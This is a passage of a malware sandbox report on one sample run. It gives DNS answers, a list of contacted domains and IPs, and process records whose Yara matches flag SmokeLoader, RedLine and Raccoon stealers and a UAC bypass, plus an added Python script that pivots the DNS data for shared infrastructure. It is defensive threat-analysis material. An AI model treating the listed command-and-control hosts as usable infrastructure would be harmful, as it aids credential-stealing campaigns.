Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 31.166.170.180 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 123.213.233.194 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:09.448448896 CEST | 8.8.8.8 | 192.168.2.3 | 0x4603 | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:11.197093010 CEST | 8.8.8.8 | 192.168.2.3 | 0x5091 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:11.197093010 CEST | 8.8.8.8 | 192.168.2.3 | 0x5091 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:11.197093010 CEST | 8.8.8.8 | 192.168.2.3 | 0x5091 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:11.197093010 CEST | 8.8.8.8 | 192.168.2.3 | 0x5091 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:11.197093010 CEST | 8.8.8.8 | 192.168.2.3 | 0x5091 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:12.723599911 CEST | 8.8.8.8 | 192.168.2.3 | 0xed15 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:12.723599911 CEST | 8.8.8.8 | 192.168.2.3 | 0xed15 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:12.723599911 CEST | 8.8.8.8 | 192.168.2.3 | 0xed15 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:12.723599911 CEST | 8.8.8.8 | 192.168.2.3 | 0xed15 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:12.723599911 CEST | 8.8.8.8 | 192.168.2.3 | 0xed15 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:17.423815966 CEST | 8.8.8.8 | 192.168.2.3 | 0x9631 | No error (0) | mas.to | | 88.99.75.82 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:20.522248030 CEST | 8.8.8.8 | 192.168.2.3 | 0x14c7 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:20.522248030 CEST | 8.8.8.8 | 192.168.2.3 | 0x14c7 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:20.522248030 CEST | 8.8.8.8 | 192.168.2.3 | 0x14c7 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:20.522248030 CEST | 8.8.8.8 | 192.168.2.3 | 0x14c7 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:20.522248030 CEST | 8.8.8.8 | 192.168.2.3 | 0x14c7 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:22.069711924 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f6 | No error (0) | mas.to | | 88.99.75.82 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:41.068432093 CEST | 8.8.8.8 | 192.168.2.3 | 0x5be6 | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:45.163240910 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4e4 | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
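The DNS Answers table is the part of a sandbox report an analyst pivots on: which names share a resolved address, which names never resolved, and where CNAME chains end. The script below is an added example, not part of the Joe Sandbox report, that does those pivots over rows transcribed (and de-duplicated) from the table above. The pipe-delimited row layout, the column names and the thresholds are this example's own conventions, not the report's.

```python
"""Pivot the DNS Answers table of a sandbox report for infrastructure overlap.

Added example; the records below are transcribed from the report's DNS Answers
table in the order of its columns, with repeated answers collapsed.
"""
import re
from collections import defaultdict

# Column order of the report's DNS Answers table.
COLUMNS = ("timestamp", "src", "dst", "txid", "rcode",
           "name", "cname", "address", "type", "class")

# Rows transcribed from the report; "none" is how the report renders the empty
# CName/Address cells of an NXDOMAIN answer, an empty field means "no value".
DNS_ANSWERS = """\
Oct 29, 2021 14:09:40.349797010 CEST|8.8.8.8|192.168.2.3|0xc836|Name error (3)|xacokuo8.top|none|none|A (IP address)|IN (0x0001)
Oct 29, 2021 14:09:40.389902115 CEST|8.8.8.8|192.168.2.3|0xff0c|No error (0)|hajezey1.top||5.188.88.203|A (IP address)|IN (0x0001)
Oct 29, 2021 14:09:41.235708952 CEST|8.8.8.8|192.168.2.3|0xbc14|No error (0)|privacytoolzforyou-6000.top||5.188.88.203|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:07.112236023 CEST|8.8.8.8|192.168.2.3|0x7901|No error (0)|cdn.discordapp.com||162.159.134.233|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:07.112236023 CEST|8.8.8.8|192.168.2.3|0x7901|No error (0)|cdn.discordapp.com||162.159.130.233|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:12.493707895 CEST|8.8.8.8|192.168.2.3|0xe2ab|No error (0)|iyc.jelikob.ru||81.177.141.36|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:20.488089085 CEST|8.8.8.8|192.168.2.3|0x77e|No error (0)|sysaheu90.top||5.188.88.203|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:27.429796934 CEST|8.8.8.8|192.168.2.3|0x48f4|No error (0)|clients2.google.com|clients.l.google.com||CNAME (Canonical name)|IN (0x0001)
Oct 29, 2021 14:10:27.429796934 CEST|8.8.8.8|192.168.2.3|0x48f4|No error (0)|clients.l.google.com||142.250.203.110|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:34.820704937 CEST|8.8.8.8|192.168.2.3|0x63a|Name error (3)|telegalive.top|none|none|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:57.240221977 CEST|8.8.8.8|192.168.2.3|0x4151|No error (0)|nusurtal4f.net||45.141.84.21|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST|8.8.8.8|192.168.2.3|0xed61|No error (0)|znpst.top||211.59.14.90|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST|8.8.8.8|192.168.2.3|0xed61|No error (0)|znpst.top||222.236.49.123|A (IP address)|IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST|8.8.8.8|192.168.2.3|0xed61|No error (0)|znpst.top||118.221.132.200|A (IP address)|IN (0x0001)
Oct 29, 2021 14:11:09.448448896 CEST|8.8.8.8|192.168.2.3|0x4603|No error (0)|api.2ip.ua||77.123.139.190|A (IP address)|IN (0x0001)
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_answers(text):
    """Split pipe-delimited rows into dicts; 'none' and '' both mean no value."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != len(COLUMNS):
            raise ValueError(f"expected {len(COLUMNS)} columns: {line!r}")
        rec = dict(zip(COLUMNS, fields))
        for key in ("cname", "address"):
            if rec[key] == "none":
                rec[key] = ""
        if rec["address"] and not IPV4.match(rec["address"]):
            raise ValueError(f"address column is not an IPv4 literal: {line!r}")
        records.append(rec)
    return records


def names_by_address(records):
    """Map each resolved IP to the sorted list of names that resolved to it."""
    out = defaultdict(set)
    for r in records:
        if r["address"]:
            out[r["address"]].add(r["name"])
    return {ip: sorted(names) for ip, names in out.items()}


def shared_infrastructure(records, min_names=2):
    """IPs answering for several distinct names: the pivot for related C2 domains."""
    return {ip: names for ip, names in names_by_address(records).items()
            if len(names) >= min_names}


def nxdomain_names(records):
    """Names that came back Name error (3): dead or unregistered fallback hosts."""
    return sorted({r["name"] for r in records if r["rcode"].startswith("Name error")})


def address_fanout(records, min_addresses=2):
    """Names answered with many distinct IPs within the capture."""
    out = defaultdict(set)
    for r in records:
        if r["address"]:
            out[r["name"]].add(r["address"])
    return {n: sorted(a) for n, a in out.items() if len(a) >= min_addresses}


def resolve(records, name, _depth=0):
    """Follow CNAME answers in the table to the final A addresses for a name."""
    if _depth > 8:  # bound the walk so a CNAME loop in hostile data cannot recurse forever
        return []
    addrs = set()
    for r in records:
        if r["name"] != name:
            continue
        if r["cname"]:
            addrs.update(resolve(records, r["cname"], _depth + 1))
        elif r["address"]:
            addrs.add(r["address"])
    return sorted(addrs)


if __name__ == "__main__":
    recs = parse_answers(DNS_ANSWERS)
    print("shared IPs:", shared_infrastructure(recs))
    print("NXDOMAIN:", nxdomain_names(recs))
    print("fan-out (>=3 addresses):", address_fanout(recs, 3))
    print("clients2.google.com ->", resolve(recs, "clients2.google.com"))
```

On these rows the shared-address pivot surfaces 5.188.88.203 as the one IP behind hajezey1.top, privacytoolzforyou-6000.top and sysaheu90.top, while the CDN and Google addresses each answer for a single name; the two .top names that returned Name error are the candidates for a fallback list that was never stood up. The thresholds are deliberately low because a single sandbox run is a short capture; tune them when running over a day of resolver logs.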

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • hdytesri.org
                                                                                                                                                  • hajezey1.top
                                                                                                                                                • hxpkekj.com
                                                                                                                                                • privacytoolzforyou-6000.top
                                                                                                                                                • glmgx.com
                                                                                                                                                • yuwnqq.com
                                                                                                                                                • bhitjmrc.com
                                                                                                                                                • dignolmjwo.com
                                                                                                                                                • uhgju.org
                                                                                                                                                • vumfxrbs.com
                                                                                                                                                • npvevaeyy.net
                                                                                                                                                • jqgngasfhc.org
                                                                                                                                                • fjibch.net
                                                                                                                                                • yvypqbsdmc.com
                                                                                                                                                • knelfvrqfb.com
                                                                                                                                                • mgtlhphal.com
                                                                                                                                                • iouiiivyis.org
                                                                                                                                                • pblfggd.net
                                                                                                                                                • qrhhbxdcks.net
                                                                                                                                                • tdgnneuj.com
                                                                                                                                                • fvlfqoywa.com
                                                                                                                                                • ymejogxekm.net
                                                                                                                                                • cfgober.net
                                                                                                                                                • weiifp.org
                                                                                                                                                • cwqkqbcdy.org
                                                                                                                                                • rxaxe.net
                                                                                                                                                • auuomlb.com
                                                                                                                                                • hhqcogw.org
                                                                                                                                                • uuocrqwp.org
                                                                                                                                                • eqvwckh.com
                                                                                                                                                • fvfjwsqv.org
                                                                                                                                                • sysaheu90.top
                                                                                                                                                • rowqyedjmp.org
                                                                                                                                                • toptelete.top
                                                                                                                                                • 194.180.174.181
                                                                                                                                                • nusurtal4f.net
                                                                                                                                                • znpst.top
                                                                                                                                                • tnjhdjy.org
                                                                                                                                                • 193.56.146.214
                                                                                                                                                • rfjetdallh.org
                                                                                                                                                • hndhvvubql.org
                                                                                                                                                • potfqvj.org
                                                                                                                                                • qpxove.net
                                                                                                                                                • oftpi.net
                                                                                                                                                • ussig.org
                                                                                                                                                • ddmqcj.org
                                                                                                                                                • swmkrkh.net
                                                                                                                                                • 65.108.80.190

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:14:08:56
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\Desktop\Md0q201V1D.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\Desktop\Md0q201V1D.exe'
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:14:09:01
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\Desktop\Md0q201V1D.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\Desktop\Md0q201V1D.exe'
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:14:09:08
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                Imagebase:0x7ff720ea0000
                                                                                                                                                File size:3933184 bytes
                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:14:09:40
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:14:09:42
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:14:09:49
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:14:09:51
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:14:10:01
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:14:10:02
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                Imagebase:0xa00000
                                                                                                                                                File size:512512 bytes
                                                                                                                                                MD5 hash:F57B28AEC65D4691202B9524F84CC54A
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.520563950.0000000006381000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.519980779.0000000005F90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\B096.exe, Author: Florian Roth
                                                                                                                                                Reputation:low

                                                                                                                                                General

Start time: 14:10:06
Start date: 29/10/2021
Path: C:\Users\user\AppData\Local\Temp\BBE1.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\BBE1.exe
Imagebase: 0x790000
File size: 22528 bytes
MD5 hash: 787AF677D0C317E8062B9705CB64F951
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, Author: Florian Roth
Antivirus matches:
• Detection: 22%, ReversingLabs
Reputation: moderate

General

Start time: 14:10:08
Start date: 29/10/2021
Path: C:\Users\user\AppData\Roaming\gbhudtb
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\gbhudtb
Imagebase: 0x400000
File size: 346624 bytes
MD5 hash: A0BC297D8EAAD37F1B145D108786E993
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 14:10:09
Start date: 29/10/2021
Path: C:\Users\user\AppData\Local\Temp\CBF0.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\CBF0.exe
Imagebase: 0x400000
File size: 212992 bytes
MD5 hash: 73252ACB344040DDC5D9CE78A5D3A4C2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 80%, ReversingLabs
Reputation: moderate

General

Start time: 14:10:10
Start date: 29/10/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
Imagebase: 0x960000
File size: 47208 bytes
MD5 hash: 3269806DC450E24113CF4FE03C3AD197
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 14:10:14
Start date: 29/10/2021
Path: C:\Users\user\AppData\Local\Temp\DF3A.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\DF3A.exe
Imagebase: 0xa40000
File size: 161280 bytes
MD5 hash: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: moderate

General

Start time: 14:10:17
Start date: 29/10/2021
Path: C:\Users\user\AppData\Local\Temp\EBBE.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\EBBE.exe
Imagebase: 0x400000
File size: 348672 bytes
MD5 hash: 539C39A9565CD4B120E5EB121E45C3C2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 14:10:20
Start date: 29/10/2021
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Imagebase: 0x7ff68b0a0000
File size: 2150896 bytes
MD5 hash: C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:10:23
Start date: 29/10/2021
Path: C:\Users\user\AppData\Local\Temp\C066.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\C066.exe
Imagebase: 0x400000
File size: 601600 bytes
MD5 hash: F0BE69176E592FA1A6345A7090A9EA30
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 14:10:24
Start date: 29/10/2021
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
Imagebase: 0x7ff68b0a0000
File size: 2150896 bytes
MD5 hash: C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 14:10:25
Start date: 29/10/2021
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Imagebase: 0x7ff68b0a0000
File size: 2150896 bytes
MD5 hash: C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 14:10:28
Start date: 29/10/2021
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
Imagebase: 0x7ff68b0a0000
File size: 2150896 bytes
MD5 hash: C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 14:10:28
Start date: 29/10/2021
Path: C:\Users\user\AppData\Local\Temp\DF3A.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\DF3A.exe
Imagebase: 0xed0000
File size: 161280 bytes
MD5 hash: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 14:10:31
Start date: 29/10/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Imagebase: 0xae0000
File size: 221800 bytes
                                                                                                                                                MD5 hash:FFF587A66B8D5A50A055B9CD6D632BEB
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                General

                                                                                                                                                Start time:14:10:42
                                                                                                                                                Start date:29/10/2021
